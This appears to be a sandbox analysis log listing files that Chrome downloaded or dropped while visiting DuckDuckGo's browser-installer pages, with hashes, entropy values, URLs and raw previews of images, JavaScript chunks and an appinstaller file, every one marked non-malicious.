                                                                                                                                                            Size (bytes):595
                                                                                                                                                            Entropy (8bit):7.487695019508559
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:6v/7iPb1qncBjsIbfCLVwzHjInZ/n9+2E0KgnE8dJ/IA6j1MTQPsd:9XVP6LyjgBn9uR8dJ/h6j1pPM
                                                                                                                                                            MD5:4871F6FB8A0A02E6B5CA349BCE6F375B
                                                                                                                                                            SHA1:9434D692502A6CF00D22F4BA6D5E2B87F5F7B07D
                                                                                                                                                            SHA-256:C854DC758AC1845E9701EB6C483B199EA399C2E09F95440899ED1FE7B143340C
                                                                                                                                                            SHA-512:BCAFF28409F0913600094ECECFE38643F2097E7C56F472ECCF85057E131FE3AD22D86AA44BEAEDAC40B4082F41C9DA63DF7454271C0508B87B70A7E0B7273EEA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/Qf59jYhfbx2rt-mNWNBXrLHH8ueA0-Hittc8HJ5MxVZXf7-NUATuHOvp-ppj_t7Q1P_WZpeVE5XSvfjf5SVVmjPK=s60
                                                                                                                                                            Preview:.PNG........IHDR...<...<......")@....sBIT.....O....BPLTEGpL.\v....Bf.]w._{.^y.\v.^y.^x....Qo.Jk.............i..^y..........<q_....tRNS.......$V.C2.....IDATH..... ..M.%......*.n......3.G.$!t....O(.s..O..*%.^...........T.....X.................Y..F.........J.....k.......d./..C.t..Y...7..%C.......p..2..z>...w.0t.e3.%./.....-.i>`..:.#h?....p. <.m...i.X...n...y......v.c.........+.aX.Uc.vf.......:`..X...G.67:`<...;..O%.....nr........y.v.~....7....<M....M.*H..)..R......!s{......H.J...L..@{.....,.j...~....H.'..qoj+....jk.....enj...M....Q...;...q%(.ey.....IEND.B`.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 640 x 410, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):68927
                                                                                                                                                            Entropy (8bit):7.970735838138142
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:y7bBleCJBgler1itO7Kq+eaVxPjUH/F9Wz:ybJBMer1gOdVazPjUH/DWz
                                                                                                                                                            MD5:3A2623C9D68F05083E03559F8BFEA459
                                                                                                                                                            SHA1:2F25089D9F0B609B7571DA62BBE54CC74E78B336
                                                                                                                                                            SHA-256:240140F5BBA4CDA9BB086E51F28988438C4D082E50ADCDFFB27B5EA41A112165
                                                                                                                                                            SHA-512:DFA1737DB9BEBCC6C31DA015039F6C6FE9D79D85E308A3E6F016CCCE6E1453989E6A69759B8C16CA80E3FE899F2FED8AE22AF117D4B5002EE879D836D60CF883
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/windows/install-step-01.png
                                                                                                                                                            Preview:.PNG........IHDR..............h.C....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...`....'y...^.....H..@..Y.tB..{..R..RZ......R..-...+!.I.";v.......{.";.vl....d..t.....o.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ...u...V.....u...y.>.v;..;..vj.........Z..}M....o.......-w.{.y}G.1...;.....vR...."........]}....vR.....{.?_{....I.b.^.jY;.\.w.............r...}z../..B...........G.>.....V.....o"~T....'....l.s....._c.{......v"s...Z.s.'yn.....$=N.:.}G....]s.5!7...^.N.)o....U...8a.....O.o........q.I....I..}.v..n...bBN.|..^H.9.1k..{.c.3.xN.{.}?H.\.^..C.u.{..r..?..`S...p.v..7...'......+.......A..$.X..8..;..'-l?.........v.q..to?.......}sSL.H......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (17425), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17425
                                                                                                                                                            Entropy (8bit):5.3599219457130225
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:ks+X39J5zK4TczK6TAyIoU17m0bkbv7eeNX2M0rwafp9oPgBPTHBg3EwIoH6:+zg1S1GeeNX23rwafp9o4BTHBAEf
                                                                                                                                                            MD5:0684E37E378C84FBED68E7DCB6756711
                                                                                                                                                            SHA1:B742A6324948499CA92058E2782E301A3B3F2517
                                                                                                                                                            SHA-256:6B18D30A0C7936F18738EDA72E691340884B963A48406D40358818F489B70AE5
                                                                                                                                                            SHA-512:CB7E4D68BA460568D5352B2A29685607B7F95CE25C68F299502BA82A6B501346ED864B0D9343C46BE56BAD26DC127D7069E7EBBBC5D1A318B99659C59915E4C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[66556],{28746:function(e,t,s){"use strict";var a=s(59499),n=s(4730),r=s(91521),i=s.n(r),o=s(94184),c=s.n(o),d=s(43165),l=s(76029),u=s(85893),p=["as","className","borderRadius","elevation","dismissable","onDismiss"];function m(e,t){var s=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);t&&(a=a.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),s.push.apply(s,a)}return s}function g(e){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{};t%2?m(Object(s),!0).forEach((function(t){(0,a.Z)(e,t,s[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(s)):m(Object(s)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(s,t))}))}return e}var h=(0,d.j)((function(e,t){var s,r=e.as,o=e.className,d=e.borderRadius,m=void 0===d?"md":d,h=e.elevation,v=void 0===h?50:h,f=e.dismissable,w=void
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17
                                                                                                                                                            Entropy (8bit):3.6168746059562227
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YGKeMfQ2i:YGKed2i
                                                                                                                                                            MD5:5B354DC2C2E5384D0251825957E02D04
                                                                                                                                                            SHA1:9F623851C6AF0AE4C45579045E09FBA3D3569D6C
                                                                                                                                                            SHA-256:8D7F931334620BE5881C2DCDCAD68C31EDDF15B6EDEF36F415980DBE6626F022
                                                                                                                                                            SHA-512:C7CC52025DFB553D399EB54C62F7C1C12F5547A2727710CC0BA6F8B501877DC6C71D840AAAAD1B0A2AA2CAA6074D19E51BA7CE3D5792560E3F1E1E0922331455
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:{"country":"US"}.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 100x297, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1750
                                                                                                                                                            Entropy (8bit):6.980599574957983
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:3iWdWcg03pHdn/Z9+KpJXlbnoKmpEndAhcyp7dlKp:KcgMpHdn/ZoKLXlLo7qecyp7I
                                                                                                                                                            MD5:C85823AE3A4CAE5E5A581630A1F67E9E
                                                                                                                                                            SHA1:CB8D881291EB8C75707DBB77FEE9E4FAD817C35B
                                                                                                                                                            SHA-256:8CEAEBE70C8518BAB15F02AC42BBAEA3D888F99F96A8689E3366115A8704F126
                                                                                                                                                            SHA-512:9BE70BE6ED149B2ECF13528847879AA8209C212D29C9D1B012EA0A15DA2A5733DD2E1554C16B31F5D29D12152726A69A3068B849514B153EDCC3C44EF9C30659
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/about-bg-dark-sm.jpg
                                                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......).d.............................................................................~.J.""...3..Q....T......I.gL$ ...P..P..PAdUr.B..T..X..l".$.%E.C.L.*....%aO...%A....H..P....V.T...D.Q.\......VAafl..x.eIR....6VT..*J.EBgP.....*J.AE..........I.,,.jym.! .......RX.....+.z..R@.B...q..%....+.q.."*....,Ua".+....U.......5""" J.(H.... .!X." $...b.. H..Tb" $.i.X....GHU..b"@.-EQT......B..DQ....tJ.@.....t..Q.......J.Z"(..cy..]..XJ.2.s..t.V%` L.N[..r.eU...&d................................w...............................?.w...............................?.w...............................?.w.......................... 0@`p........?!.S......fg.33333=ffffffff|33....g.>.....4.Dp.dDx#..""""<.....g......g.......,..;..,...,................==..g@.ZK.zM#..J.............g.7{......).h.N...ai..oK..M@y3...kGX?..*0.-0..q..\.....=m...|..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):73885
                                                                                                                                                            Entropy (8bit):4.47347706740797
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:zdrv1lFJUokxJQo13iksyBAL3sbRMR3+j+h+CpeH8aCYRq9Tg343yadgJw:zV1lFyT3ikWp1R9n1
                                                                                                                                                            MD5:5F5108171CBAE8DE0A63C9DB0A1BAC69
                                                                                                                                                            SHA1:895BFDC3D3888C60162C51EF14E7ADD4EABCDFE2
                                                                                                                                                            SHA-256:68BCE3BE6E209365C421794CB26C27BF49D8F967EB16B7FA86D643E216DA7E8B
                                                                                                                                                            SHA-512:19024519F3ADD09373C8088B3E36E860FC188DDAB58576939733573DACE308764DD7D4854213D1FA2C5DFD0F64EC56ED5CC10A4DFC6C648A7F178E2D0DAFCB9F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:!function(){"use strict";var e={},c={};function b(f){var d=c[f];if(void 0!==d)return d.exports;var a=c[f]={exports:{}},t=!0;try{e[f].call(a.exports,a,a.exports,b),t=!1}finally{t&&delete c[f]}return a.exports}b.m=e,b.amdO={},function(){var e=[];b.O=function(c,f,d,a){if(!f){var t=1/0;for(u=0;u<e.length;u++){f=e[u][0],d=e[u][1],a=e[u][2];for(var n=!0,r=0;r<f.length;r++)(!1&a||t>=a)&&Object.keys(b.O).every((function(e){return b.O[e](f[r])}))?f.splice(r--,1):(n=!1,a<t&&(t=a));if(n){e.splice(u--,1);var o=d();void 0!==o&&(c=o)}}return c}a=a||0;for(var u=e.length;u>0&&e[u-1][2]>a;u--)e[u]=e[u-1];e[u]=[f,d,a]}}(),b.n=function(e){var c=e&&e.__esModule?function(){return e.default}:function(){return e};return b.d(c,{a:c}),c},function(){var e,c=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};b.t=function(f,d){if(1&d&&(f=this(f)),8&d)return f;if("object"===typeof f&&f){if(4&d&&f.__esModule)return f;if(16&d&&"function"===typeof f.then)return f}var a=
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):185933
                                                                                                                                                            Entropy (8bit):5.895001324343921
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:bAPZR6R6BxJ1Wxuto28Q1iWBKQME9rLi/:bASxyo28FWBKJEVG/
                                                                                                                                                            MD5:7BB0CD7DA8E976684D4CE28FD9B5F9FE
                                                                                                                                                            SHA1:EDB271BBA12BC497A0BC90284075E0392BAB6C1C
                                                                                                                                                            SHA-256:A6295D37F77116BEFA3941D8859424817DD00A48EE13F7C97FD7EA87FB3B6093
                                                                                                                                                            SHA-512:0EBF389DEC4392E944A9880C97E5EA037D097A9566062230B46D24317782E6ACF657F173C8E28BD5507018F7CB00E4A61A3E5BCF605EEB16D7D0849438886B41
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4770],{33436:function(e,i,a){"use strict";a.d(i,{Z:function(){return p}});var t=a(59499),s=a(17674),c=a(67294),o=a(86896),r=a(94184),n=a.n(r),M=a(682),l=a(30178),N=a(85194),g=a(18999),j=a(95912),u=a(87188),d=a(76029),D=a(91644),I=a.n(D),x=a(98988),A=a(85893);function L(e,i){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);i&&(t=t.filter((function(i){return Object.getOwnPropertyDescriptor(e,i).enumerable}))),a.push.apply(a,t)}return a}function z(e){for(var i=1;i<arguments.length;i++){var a=null!=arguments[i]?arguments[i]:{};i%2?L(Object(a),!0).forEach((function(i){(0,t.Z)(e,i,a[i])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(a)):L(Object(a)).forEach((function(i){Object.defineProperty(e,i,Object.getOwnPropertyDescriptor(a,i))}))}return e}var T={default:{ios:{dark:d.AppStoreWhite,light:d.AppStoreWhiteBordered},android:{dark:d.PlayStoreWhite
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (62723), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):62723
                                                                                                                                                            Entropy (8bit):5.9041522883656326
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:KtGMJyOoFWkYNS4qb8+Pxjf3keYUQrVyHCgQELCXcudnrH5Is+AWPB1xds:gM6N88ITpYUSVNrHqtAkxds
                                                                                                                                                            MD5:5CBC2272676A2E53CB45C44F986CB7C7
                                                                                                                                                            SHA1:3ED92D73E8B26502664D8C608BEF74F2424124AA
                                                                                                                                                            SHA-256:F13F5690B5F05DDAA88C154253B554B56858F53D966F46C4E40F9A4FF2C09E26
                                                                                                                                                            SHA-512:B70028BF6D52DF2A2E4A2468116C86E22D60642738C4C371DC4BFFB55971D3557F4BA74C7AAD55DA1F51EF2668FA0BFA18CFAD55311E007F66CCD350763C849A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[69706],{39040:function(M,N,e){"use strict";e.r(N),e.d(N,{__N_SSG:function(){return JM},default:function(){return qM},head:function(){return XM},seo:function(){return KM}});var j=e(59499),D=e(17674),i=e(9008),I=e.n(i),g=e(67294),z=e(16682),o=e(11251),n=e(18999),u=e(87188),c=e(97637);var a=e(29277),t=e(85194),s=e(77646),T=e(32634),r=e(94184),A=e.n(r),l=e(86896),y=e(91515),O=e(51420),L=e(85893);function x(M){var N=M.children,e=(0,n.nO)();return(0,L.jsxs)(L.Fragment,{children:[(0,L.jsxs)(I(),{children:[(0,L.jsx)("link",{rel:"preconnect",href:(0,O.qQ)("countryCode")}),(0,L.jsx)("link",{rel:"preload",href:(0,O.qQ)("countryCode"),as:"fetch",fetchPriority:"high"})]}),N({country:e})]})}var d=e(65367),Q=e(27628),S=e(90372),k=e(89447),U=e(44820),Y=e(67499),m=e(30178),w=e(44012),C=e(76029),E=e(9868),b=e.n(E);function h(M){var N=M.className,e=M.fallback,i=M.dismissable,I=void 0!==i&&i,g=M.isMobileDevice,z=void 0!==g&&g,o=(0,n.Nd)(),u=(0,n._)(
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):331787
                                                                                                                                                            Entropy (8bit):5.517673558177757
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Q9p1wpYvpvGI8hQp5/d/jDDC0pm4Kn21xIjjOD5QVUTThkuThgDZ/6Ay6o8fgn+U:x9I8hQp5l/W0p+neIj0QVUjKORH
                                                                                                                                                            MD5:C505A47894A6EB41492A13432DB092A7
                                                                                                                                                            SHA1:68CD91140598E3A1ADE7084A912229EBBACE6A24
                                                                                                                                                            SHA-256:9113FF1A7BEEAE3FDE3CD51883AF8745EFBEFF2EE3CEAC7B18D52E7141F7D683
                                                                                                                                                            SHA-512:1ACCC18B85864ADEFCC5E5E884EE7ADC95CE47FE9D7ED93208624E8B2415EA58D70D224B065AC7350C717BEF03048BC44CD9B88BBB54818D698EAD8B4B8E6AEB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/62242-83217c40c929790f.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[62242],{64289:function(e,t,M){"use strict";var l,c,a=M(67294);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var M=arguments[t];for(var l in M)Object.prototype.hasOwnProperty.call(M,l)&&(e[l]=M[l])}return e},n.apply(this,arguments)}t.Z=function(e){return a.createElement("svg",n({fill:"none",viewBox:"0 0 16 16",xmlns:"http://www.w3.org/2000/svg"},e),l||(l=a.createElement("g",{clipPath:"url(#fewer-ads-color-16_svg__Fewer-Ads-Color-16_svg__a)"},a.createElement("path",{fill:"#F5F5F5",d:"M9.986 0H2.5A2.5 2.5 0 000 2.5v11A2.5 2.5 0 002.5 16h11a2.5 2.5 0 002.5-2.5V8.869a3.078 3.078 0 01-.35.137l-.034.011a3.049 3.049 0 01-.427.098c-.154.027-.338.054-.533.081-.191.027-.399.053-.607.079-.074.617-.16 1.269-.227 1.544l-.003.011c-.055.226-.146.598-.397.87-.328.354-.753.388-1.02.388-.413 0-.791-.146-1.06-.484-.185-.234-.28-.529-.332-.692v-.001l-.011-.034a3.198 3.198 0 01-.094-.43 17.327
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11383
                                                                                                                                                            Entropy (8bit):7.958469961100936
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:uSJhs0bwoV6+IU110b60wnbkKwSWi8nvEX+votDnD40C/gB/Lg0EEfyHDKzjNNel:RJ20bwS6+I+0b64KbWi8nvEgotzywjgj
                                                                                                                                                            MD5:280DD35F5047BD46EC2AFBEEA0FE6C23
                                                                                                                                                            SHA1:DE3A40EF70627FE05B54E44C68E7834686D0D388
                                                                                                                                                            SHA-256:D4692FB34E947C099A267AC1FBBDBFCDAEC064642385836FF2792E2506EC7D4C
                                                                                                                                                            SHA-512:A4B900B2289598424D9724B4ED21A753EB6E6BB2F6186FD0F4EE7642946DB93C454A458D5F9F0270C64B1DC6CA09C1050C00348C89D78ACE25E484594C99DF24
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...d...d.....p.T....bKGD..............pHYs............... .IDATx.}.w..o..../.%.Z-..Z[Kk_....b0.l.8.......7s......7..=.L.....n....8v.....A...*.I8.#.....u.>.......3..:3k....x...W.Y.....G.,........2.Z...bf.3.3.~I.3....~......f.sKf6.{..7b.E3.cf...n3k..{...0~.6..~.........ef...3k6.1.7kfuf.#........Z..,~.........@..}..W..^.......O............e....x.(..l.^{ 5.z...j....l..'|....9...b..ef...Y..fhq.7...MW.h...h.....Y.O........mE3..5.!.zL$O....Z....F.c. ..!..i.w...f6I..f..k.f6..4....~.......".F.u.......`..DV.7We|i.[..Z.9.p....Tkf;1.F3.jf.nn..>.ef.h.....7..<...Y.'.....Nu...h......Y..;hfu......M.+$....2mf.|=r..nN.........q.d../.........r[.......f...&..;..Y2i{|......h.k.o...[.{;]...:i........p...eY.Y.._M......l.e.!..f. f... ."...`B.D......h...Cs.@..A.{...`.J.....r.u...I9& h..^..v.f7E.Pwp.#..f...+vh...d..f..~m0..Q.%3....f......D..:I.l3...j.&.g..V.L..$.~FA$.:.^G..&.m.M..u.6..).%..r...........# ...)..L."P.Z.q.;gFU.}G..\..8..=t.&l..&Y..3.......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):765
                                                                                                                                                            Entropy (8bit):5.604814118594547
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:MMHddXOtPItOX9s2Xc44+Do9XbeSqxWPh/JpMZrYDU5dBmwBeC8eckJsooTsn/cG:JdVOO+Gwc44+cbNh/sVYDk8dkJsouk64
                                                                                                                                                            MD5:56C713306E2ECE8B12A9F3163E09AFE6
                                                                                                                                                            SHA1:49F5852F7EAE7619BB2842D260739B9E3CD61DC5
                                                                                                                                                            SHA-256:BD5403F994DBB6DA9F44C0B0010CC7A70D425872C9155D069C28C0ABCDD34792
                                                                                                                                                            SHA-512:8DBC0A11D0089603539A1C52314EC7AA62762554A1A1EFD27CB09ADC4D4625CAA08CF7F4DDA3A5975CF85C41BC47AE47BA5707BC8A9B20A008B6D3156AD6C305
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://staticcdn.duckduckgo.com/windows-desktop-browser/installer/funnel_home___hero/DuckDuckGo.appinstaller
                                                                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8"?>..<AppInstaller...Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___hero/DuckDuckGo.appinstaller"...Version="0.90.3.0" xmlns="http://schemas.microsoft.com/appx/appinstaller/2017/2">...<MainBundle....Name="DuckDuckGo.DesktopBrowser"....Version="0.90.3.0"....Publisher="CN=&quot;Duck Duck Go, Inc.&quot;, OU=Engineering, O=&quot;Duck Duck Go, Inc.&quot;, L=Paoli, S=Pennsylvania, C=US, SERIALNUMBER=5019303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US"....Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle" />..</AppInstaller> ..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 192x120, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):6532
                                                                                                                                                            Entropy (8bit):7.919285111879729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:wSvosqpgg5xMzuUvRM3t2Z6SUtASSoSZfJ8c5s9:wuqAKUJEI3UaSvSpJL6
                                                                                                                                                            MD5:7CB6D0CB40A73AD477F094E2BA65F677
                                                                                                                                                            SHA1:8AF1F3C0BF9EFFB48CEAB40758B885A6C966576A
                                                                                                                                                            SHA-256:9782CC5D4CCAAE985A2432BD53CD3CD502F1887EA080EDCFAA027A6E466A7A3A
                                                                                                                                                            SHA-512:B9973E88963ADB20C230E2F9241AA84CF67E176DC6E65F6252BFA15EF31D6693F299754364D429BEFFC300770A0A58A7978A129BC27B654E45A2F01B35A5B07D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/04Pvf_aHNL0yjC-7q52a48eZichJB2J9m-q_JACGVUbjDQDlVdCVIVy2g24n79GsYTcm8fxk07rhPVvQHDRXzuV9Dg=s192-w192-h120
                                                                                                                                                            Preview:......JFIF......................................................................................................................................................x.............................................@...........................!.."..#12AQRUr...%3.....5Ca4BTq$....................................;........................!1.AQaq..."24RS.....3B.5....#br..............?...n.t.h..hE.Z..K.......xj.....vj..&....j.$..=.5e].........<:=..fA.A.*...8.h.d..xe.. ..-]Tf.....uQ..$P.U.Fk.(2V..*hY...k.!M%^2!(!M%]H.E4.x..q....Y.(.yj.q....&.%...b.).0......&zB.F....V....+b$.<.lE..7^._ky..n......Ak:B....'...YS#.Y.,.E~....V..J.MJ.E...|.\..~3..a.t.B.).P..8.$.I~..Z.l.......R..[-.......'I.......<...c!.".6..j.=BRp.r....6....s.|a...N.*...m8F.qRq.M%g~Z;5.OM..7]1......,.<.YM.wD.,.+..E...*. .t.*.&.Z...F.o+..k._.C...........c..;....{...f.KL{..ki.c...D...7.....+F.n...e....U..@VK.<.I.k..m..K.RUcJP..Uv.d.W.....+...I..m.....1..~...KD......!5.,.....prME.*O....|f...F.G..=Eevz......3..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):877
                                                                                                                                                            Entropy (8bit):7.706260177908377
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:DwkrENIAeJfEdEeymGPEgQ13WNHzMVH63eiQ3rLvQgW:Dwk57Jf1XmGsl+HIVauiQvy
                                                                                                                                                            MD5:DA508EF0D969DB312BBDD380EB89F33E
                                                                                                                                                            SHA1:FE03395721F4F46AD6D9BB8EBF73D9BCB295DC8C
                                                                                                                                                            SHA-256:D373F3E7F8EDF91650D4BD0B2343F611B76351738B94C39D16FAF8FB4F7F55DD
                                                                                                                                                            SHA-512:FD8B88BC09F6AD89AC362601D9932574DF965CC38541862A580AB068D36EED0ECEAFDA5D35793A3FE4D3F715B4E6611421F1967EAE021E2CE4BA6A96A96E575F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/gQTYw5DF7N0use9RHAenwHN-CAmr2Ml42qOiwaFr0L17c4xfik_TOv-fjEwjO_BGA_AQRGql_t3Zew1EX9a_CA9eWA=s60
                                                                                                                                                            Preview:.PNG........IHDR...<...<.....:..r....sBIT....|.d....$IDATh..1hTi...3k6*kes.l.x.........E@....".&...*Y.?.4.6)D.F+....%.rZ(.w....9.!.......[B.........}3...|..o....C7.2.9 .@>_....G....O.:.g..`...wv...X........O.:9,.] .dv.R7l.2Z.d..p.{.....t.:q%./. ...8.t&1r\..Ig.#..x.t.1.B......yU..PO:....iI..`.....n.H0..*@e...r...../....r.2Z...{.m|g.~w5...9$.G.......9.....,.v....4...}.....j[9.@m:;..].....N..j.k.=9._,.>.{[9. %._l...........'..}...3.(...3z'......M.....%.o;...s.]S.V.......`.T=.,...%..H..........w6....@Fh......|...37.....3.4..|.~.n......(....|...X.t(_....k..._.a+.!....5.Q..bC~X...u...<l..`..Q...H..Q...Y..N.....U....WJ._x.G.....|...X.........{/...l:.333.U..H.F..299....f....}f........R.X\.#......a.......Q......s.1\.....'. .\....Q....i.p ...&.....Ho.N......H..N..KQ.P...]q.].:....w.<.....$....P(.".....n.Y..M.ta/.u......3.......IEND.B`.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 275 x 175, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):38476
                                                                                                                                                            Entropy (8bit):7.967719487430254
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:BbUCtQRo9M8sl4CDz+9UfYt4pmsUoFmYyizJ6r4OifXIK:BWmCxYZoFmY/dqvK
                                                                                                                                                            MD5:DD078E5E223C29A7C7E94E5ACD386EED
                                                                                                                                                            SHA1:44F69F8511649439DDE2392B90567919ECBBE5E3
                                                                                                                                                            SHA-256:78984A50A69512D19E90020D9BEAABB7B5C17103A7B1F729B76788604DBD647F
                                                                                                                                                            SHA-512:A85DB6263089901E4C3BF26068B2D9679422B964B501CBA9ED64066837A518C4D7E289E50575A740B710B5DE0D189804A0FD25F7DA58A1A47AAE88B6B2B3D8ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/E_2s-5WfnxwAc46aTKDQiKBh9JmLKSusH2vctWR0NNvycRM1T2TQpBq_u-Lf6SJkOmakBkLp8g24V0wVjKiFaCbL5ws=s275-w275-h175
